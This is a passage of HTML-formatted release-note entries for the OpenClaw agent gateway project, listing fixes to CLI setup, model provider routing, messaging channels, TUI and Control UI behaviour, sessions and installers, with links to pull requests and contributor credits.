<li>CLI/skills: show an all-ready note with next-step commands when skill setup has no missing dependencies to install. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4496420539" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85032" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/85032/hovercard" href="https://github.com/openclaw/openclaw/pull/85032">#85032</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/aniruddhaadak80/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/aniruddhaadak80">@aniruddhaadak80</a>.</li>
<li>Microsoft Foundry: route DeepSeek V4 Pro and Flash models through the Foundry Responses API while keeping older DeepSeek models on their existing path. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4506164844" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85549" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/85549/hovercard" href="https://github.com/openclaw/openclaw/pull/85549">#85549</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roslinmahmud/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roslinmahmud">@roslinmahmud</a>.</li>
<li>Status/usage: show configured cost estimates for AWS SDK models in full usage output while keeping token-only usage replies cost-free. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4506775969" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85619" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/85619/hovercard" href="https://github.com/openclaw/openclaw/pull/85619">#85619</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ItsOtherMauridian/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ItsOtherMauridian">@ItsOtherMauridian</a>.</li>
<li>Agents/OpenAI Responses: retry non-visible reasoning-only turns for OpenAI Responses API families instead of treating them as empty failed turns. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4506665584" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85603" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/85603/hovercard" href="https://github.com/openclaw/openclaw/pull/85603">#85603</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SebTardif/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SebTardif">@SebTardif</a>.</li>
<li>Directive tags: preserve message and content-part object identity when display stripping makes no directive-tag changes. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4507633147" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85682" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/85682/hovercard" href="https://github.com/openclaw/openclaw/pull/85682">#85682</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/willamhou/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/willamhou">@willamhou</a>.</li>
<li>Telegram: send local <code>path</code>/<code>filePath</code> and structured attachment media from <code>sendMessage</code> actions instead of dropping them or sending text-only messages. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4499834705" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85219" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/85219/hovercard" href="https://github.com/openclaw/openclaw/pull/85219">#85219</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/keshavbotagent/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/keshavbotagent">@keshavbotagent</a>.</li>
<li>Sessions/status: show the estimated context budget when fresh provider usage is unavailable and clear stale estimates across session resets and compaction boundaries. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4492043109" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/84830" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/84830/hovercard" href="https://github.com/openclaw/openclaw/pull/84830">#84830</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/giodl73-repo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/giodl73-repo">@giodl73-repo</a>.</li>
<li>Gateway/config: pin relative <code>OPENCLAW_STATE_DIR</code> overrides to an absolute path at startup so later working-directory changes cannot retarget gateway state. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4116048289" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/52264" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/52264/hovercard" href="https://github.com/openclaw/openclaw/pull/52264">#52264</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/PerfectPan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/PerfectPan">@PerfectPan</a>.</li>
<li>Checks/Parallels: make changed-lane scripts, shrinkwrap generation, and Parallels package smoke host commands run through native Windows-safe paths and <code>npm</code>/<code>pnpm</code> shims.</li>
<li>Release/package: run npm release, prepublish, and postpublish verification through Windows-safe npm command shims so native Windows checks can execute <code>npm.cmd</code> instead of treating it as a binary.</li>
<li>Agents/harness: pass CLI runtime aliases through harness selection so provider-owned CLI aliases no longer get rejected before reaching the right runtime. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4506833876" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85631" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/85631/hovercard" href="https://github.com/openclaw/openclaw/pull/85631">#85631</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/potterdigital/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/potterdigital">@potterdigital</a>.</li>
<li>Secrets: show the irreversible apply warning after interactive <code>secrets configure</code> confirmation so confirmed migrations still get the final safety prompt. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4506862743" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85638" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/85638/hovercard" href="https://github.com/openclaw/openclaw/pull/85638">#85638</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alkor2000/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alkor2000">@alkor2000</a>.</li>
<li>Agents/CLI output: ignore cumulative Claude <code>stream-json</code> result usage when assistant usage events are present, preventing inflated cache-read accounting. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4506794947" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85625" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/85625/hovercard" href="https://github.com/openclaw/openclaw/pull/85625">#85625</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zhouhe-xydt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zhouhe-xydt">@zhouhe-xydt</a>.</li>
<li>CLI: keep <code>waitForever()</code> alive by leaving its keep-alive interval ref'd so the public helper no longer exits immediately with Node's unsettled-await code. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4507745080" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85694" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/85694/hovercard" href="https://github.com/openclaw/openclaw/pull/85694">#85694</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/m1qaweb/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/m1qaweb">@m1qaweb</a>.</li>
<li>Agents/bootstrap: guard bootstrap name checks against missing file names so malformed bootstrap entries warn and truncate instead of crashing. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4505840430" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85523" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/85523/hovercard" href="https://github.com/openclaw/openclaw/issues/85523">#85523</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4506755578" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85615" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/85615/hovercard" href="https://github.com/openclaw/openclaw/pull/85615">#85615</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zhouhe-xydt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zhouhe-xydt">@zhouhe-xydt</a>.</li>
<li>CLI/tasks: reject partially numeric <code>openclaw tasks audit --limit</code> values so audit limits must be real positive integers instead of accepting strings like <code>5abc</code>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4493313282" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/84901" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/84901/hovercard" href="https://github.com/openclaw/openclaw/pull/84901">#84901</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jbetala7/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jbetala7">@jbetala7</a>.</li>
<li>Status/diagnostics: bound deep Docker audit probes so <code>openclaw status --deep</code> reports slow container checks instead of hanging behind unbounded inspection. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4504716306" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85476" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/85476/hovercard" href="https://github.com/openclaw/openclaw/pull/85476">#85476</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/giodl73-repo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/giodl73-repo">@giodl73-repo</a>.</li>
<li>Providers/Anthropic: migrate 1M context handling to GA-capable Claude 4.x models by sizing eligible models at 1M without the retired <code>context-1m-2025-08-07</code> beta, ignoring that retired beta in older configs, and preserving OAuth-required Anthropic beta headers. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4074276828" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/45613" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/45613/hovercard" href="https://github.com/openclaw/openclaw/pull/45613">#45613</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/haoyu-haoyu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/haoyu-haoyu">@haoyu-haoyu</a>.</li>
<li>Cron/Telegram: parse forum-topic delivery targets through the Telegram plugin instead of cron core, including <code>:topic:</code> and <code>:topicId</code> forms for announce delivery. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/etticat/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/etticat">@etticat</a>.</li>
<li>Twitch: keep stale message-handler cleanup callbacks from removing newer handler registrations for the same account, preserving inbound message delivery after reconnects. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4473949550" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83888" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/83888/hovercard" href="https://github.com/openclaw/openclaw/issues/83888">#83888</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4503861323" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85425" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/85425/hovercard" href="https://github.com/openclaw/openclaw/pull/85425">#85425</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alkor2000/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alkor2000">@alkor2000</a>.</li>
<li>Control UI/chat: keep light-mode model, thinking, config, and agents select arrows visible without tiling background icons. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4508151360" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85713" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/85713/hovercard" href="https://github.com/openclaw/openclaw/issues/85713">#85713</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Linux2010/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Linux2010">@Linux2010</a>.</li>
<li>Memory/LanceDB: expose public memory artifacts through the active memory provider bridge so memory-wiki imports durable memory files, daily notes, dream reports, and event logs without depending on memory-core internals. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4469394538" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83604" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/83604/hovercard" href="https://github.com/openclaw/openclaw/issues/83604">#83604</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4496988085" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85060" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/85060/hovercard" href="https://github.com/openclaw/openclaw/pull/85060">#85060</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/brokemac79/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/brokemac79">@brokemac79</a>.</li>
<li>Crabbox: keep AWS hydration compatible with local Actions replay by inlining the hydrate workflow's Node/pnpm setup instead of invoking repo-local composite actions.</li>
<li>Agents/subagents: simplify native sub-agent completion handoff so children report their latest visible assistant result to the requester without using <code>message</code>, while keeping parent-owned message-tool delivery policy intact. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4497194072" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85070" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/85070/hovercard" href="https://github.com/openclaw/openclaw/issues/85070">#85070</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4497708252" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85089" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/85089/hovercard" href="https://github.com/openclaw/openclaw/pull/85089">#85089</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/brokemac79/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/brokemac79">@brokemac79</a>.</li>
<li>Docker setup: stop printing the Gateway bearer token in setup logs and printed follow-up commands.</li>
<li>Gateway: defer channel account startup work until HTTP readiness and remove startup model prewarm, avoiding startup event-loop stalls and timer-delay warnings.</li>
<li>Models/perf: reuse plugin metadata during models.json planning, keep bundled catalog augmentation manifest/static, and use static provider catalogs for metadata-only startup discovery so provider model normalization, auth discovery, and Gateway startup metadata do not reload broad plugin runtimes.</li>
<li>Agents: let embedded compaction fallback retries proceed when PI-compatible candidates do not need agent harness plugin preparation.</li>
<li>Agents/tools: honor configured custom provider API keys when deciding whether media, image-generation, video-generation, music-generation, and PDF tools are available. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4506426602" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85570" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/85570/hovercard" href="https://github.com/openclaw/openclaw/pull/85570">#85570</a>)</li>
<li>StepFun: stop advertising stale generic API key auth choices so onboarding only offers runtime-backed Standard and Step Plan choices.</li>
<li>Diagnostics: keep OpenTelemetry log bodies behind explicit content capture and scrub scoped agent-session keys from OpenTelemetry and Prometheus labels while preserving bounded queue-lane prefixes.</li>
<li>Windows installer: fail Git checkout installs when <code>pnpm install</code> or <code>pnpm build</code> fails instead of writing a wrapper to a missing CLI build.</li>
<li>Sessions: surface previous-transcript archive failures during <code>/new</code> rotation so disk rename errors are logged instead of silently hiding stranded transcript files. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4450603065" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/81984" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/81984/hovercard" href="https://github.com/openclaw/openclaw/issues/81984">#81984</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4506566941" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85586" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/85586/hovercard" href="https://github.com/openclaw/openclaw/pull/85586">#85586</a>, from <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4452599340" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82081" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/82081/hovercard" href="https://github.com/openclaw/openclaw/pull/82081">#82081</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/0xghost42/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/0xghost42">@0xghost42</a>.</li>
<li>TUI/agents: mirror internal-ui message-tool replies into final chat output so message-tool-only agents remain visible in <code>openclaw tui</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4506023907" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85538" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/85538/hovercard" href="https://github.com/openclaw/openclaw/issues/85538">#85538</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/danpolasek/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/danpolasek">@danpolasek</a>.</li>
<li>Gateway/TUI: preserve source-reply metadata through reply normalization and emit message-tool-only agent replies over the live chat stream so <code>openclaw tui</code> renders Codex replies without waiting for a history refresh. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Codex/TUI: keep long source-reply runs alive after Codex reasoning completes so delayed visible <code>message</code> calls can still reach <code>openclaw tui</code>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>TUI: keep quiet active runs busy after the response watchdog notice instead of reopening the prompt and encouraging duplicate submissions while the backend turn is still running. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Agents: preserve the latest assistant thinking blocks while stripping invalid replay signatures from older turns, and retry Anthropic thinking failures without thinking replay. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4506261816" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85557" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/85557/hovercard" href="https://github.com/openclaw/openclaw/issues/85557">#85557</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bryanbaer/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bryanbaer">@bryanbaer</a>.</li>
<li>Agents: keep parallel OpenAI-compatible tool-call deltas in separate argument buffers so interleaved tool calls no longer corrupt streamed arguments. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4456042108" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82263" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/82263/hovercard" href="https://github.com/openclaw/openclaw/pull/82263">#82263</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/luna-system/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/luna-system">@luna-system</a>.</li>
<li>Telegram: avoid false pairing prompts after transient pairing-store read failures while preserving configured <code>allowFrom</code> and per-DM pairing authorization. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4506247444" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85555" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/85555/hovercard" href="https://github.com/openclaw/openclaw/pull/85555">#85555</a>)</li>
<li>Memory/doctor: report missing or unusable QMD workspace directories as workspace failures instead of generic binary failures. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4224755918" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63167" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/63167/hovercard" href="https://github.com/openclaw/openclaw/pull/63167">#63167</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sercada/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sercada">@sercada</a>.</li>
<li>Debug proxy: record CONNECT client-socket errors and destroy the paired upstream socket so abrupt client disconnects no longer leak tunnel resources. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4458576707" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82444" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/82444/hovercard" href="https://github.com/openclaw/openclaw/pull/82444">#82444</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SebTardif/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SebTardif">@SebTardif</a>.</li>
<li>Diffs: continue hydrating later diff cards when one card fails so a single broken card no longer blanks the whole diff viewer. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4491329251" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/84775" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/84775/hovercard" href="https://github.com/openclaw/openclaw/pull/84775">#84775</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cosmopolitan033/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cosmopolitan033">@cosmopolitan033</a>.</li>
<li>Mac app: use the native settings sidebar window chrome so the sidebar toggle stays on the left and content no longer clips under oversized titlebar padding.</li>
<li>QA-Lab/Codex: bundle auth/plugin fixture imports for flow scenarios and let terminal async media tools end Codex app-server turns without timing out. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4416570826" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/80397" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/80397/hovercard" href="https://github.com/openclaw/openclaw/issues/80397">#80397</a>, refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4416039198" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/80323" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/80323/hovercard" href="https://github.com/openclaw/openclaw/pull/80323">#80323</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/100yenadmin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/100yenadmin">@100yenadmin</a>.</li>
<li>WhatsApp: persist inbound message delivery state through plugin state before dispatch and delay read receipts until handler completion, so retryable failures can redeliver without adding a plugin-local disk cache. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/samzong/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/samzong">@samzong</a>.</li>
<li>Gateway/agents: preserve fresh session overrides and metadata when stale cached agent-session entries race with store updates, so subagent model/provider overrides and routing policy survive concurrent writes. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3953968159" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/19328" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/19328/hovercard" href="https://github.com/openclaw/openclaw/pull/19328">#19328</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/CodeReclaimers/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/CodeReclaimers">@CodeReclaimers</a>.</li>
<li>Control UI/chat: keep chat session search inline with the session selector so the header no longer shows a duplicate standalone search row.</li>
<li>Control UI/chat: collapse focused-mode header chrome and suppress hidden-header scroll updates so focus mode no longer jumps while scrolling. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</li>
<li>Codex app-server: restart the native app-server and retry once when server-side compaction times out, so preflight compaction stalls recover instead of failing every dispatch. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4505443171" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85500" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/85500/hovercard" href="https://github.com/openclaw/openclaw/pull/85500">#85500</a>)</li>
<li>Restore Control UI gateway token pairing [AI]. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4504391156" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85459" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/85459/hovercard" href="https://github.com/openclaw/openclaw/pull/85459">#85459</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pgondhi987/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pgondhi987">@pgondhi987</a>.</li>
<li>OpenAI video: honor configured provider request private-network opt-in for local/custom video endpoints so explicitly trusted mock and self-hosted providers are not blocked. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>OpenAI video: send uploaded video edit requests to the documented <code>/videos/edits</code> endpoint with a <code>video</code> file instead of posting MP4 references to <code>/videos</code>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Agents/channels: preserve message-tool delivery evidence through gateway agent completion handoffs so successful generated media sends are not followed by false failure messages. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>CLI/update: repair managed npm plugin <code>openclaw</code> peer links during post-core convergence and reject stale or wrong-target peer links before restart. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4473034358" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83794" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83794/hovercard" href="https://github.com/openclaw/openclaw/pull/83794">#83794</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fuller-stack-dev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fuller-stack-dev">@fuller-stack-dev</a>.</li>
<li>CLI/agents: default new omitted-account bindings to all accounts when the channel has multiple configured accounts, and clarify account-scope docs. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4094569524" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/49769" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/49769/hovercard" href="https://github.com/openclaw/openclaw/pull/49769">#49769</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Gcaufy/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Gcaufy">@Gcaufy</a>.</li>
<li>Codex app-server: let authorized <code>/codex</code> control commands such as <code>/codex detach</code> escape plugin-owned conversation bindings while keeping unknown or unauthorized slash text routed to the bound plugin. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4499059714" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85157" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/85157/hovercard" href="https://github.com/openclaw/openclaw/issues/85157">#85157</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4499435509" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85188" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/85188/hovercard" href="https://github.com/openclaw/openclaw/pull/85188">#85188</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TurboTheTurtle/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TurboTheTurtle">@TurboTheTurtle</a>.</li>
